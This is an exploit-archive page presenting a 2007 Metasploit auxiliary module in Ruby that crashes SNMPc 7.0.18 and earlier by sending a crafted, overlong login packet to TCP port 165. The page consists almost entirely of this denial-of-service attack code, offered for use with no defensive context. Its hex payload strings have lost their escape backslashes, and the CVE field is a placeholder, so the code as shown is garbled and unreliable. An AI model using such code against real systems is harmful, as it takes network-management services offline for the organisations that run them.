SNMPc <= 7.0.18 Remote Denial of Service Exploit (meta)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : SNMPc <= 7.0.18 Remote Denial of Service Exploit (meta)
# Published : 2007-06-04
# Author : En Douli
# Previous Title : DRDoS - Distributed Reflection Denial of Service
# Next Title : Acoustica MP3 CD Burner 4.32 Local Buffer Overflow PoC

##
# $Id: snmpc.rb  2007-06-03  $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'

module Msf

class Auxiliary::Dos::Windows::Snmpc < Msf::Auxiliary

	include Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'SNMPc ',
			'Description'    => %q{
				This module sends a specially-crafted packet to the service login of snmpc 
				causing a denial of service of snmpc.
			},
			'Author'         => [ 'En Douli, Tks to OaiTeam <DouliEn@gmail.com>' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 1 $',
			'References'     =>
				[
					[ 'CVE', 'XXXXXXX' ],
				]))
			
			register_options([Opt::RPORT(165),], self.class)
	end

	def run
		connect
		init = "x14x00x00x00x70xa9x00x00x51x03x00x00x02x00x00x00x72x63x6fx6e"
		pkt = "x29x00x00x00xbcxeex00x00x52x03x00x00x02x00x00x00x41x64x6dx69x6ex69x73x74x72x61x74"
		pkt << "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" * 56
		pkt << "x41x41x41x41x41x41x41x41x41x09"
		pkt << "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" * 35
		pkt <<	 "x41x41x41x41x41x41x41x41x09x30x00"
		
		print_status("Sending dos packet ... ")
		
		sock.put(init)
		sock.put(pkt)
		
		disconnect
	end

end
end	

# www.Syue.com [2007-06-04]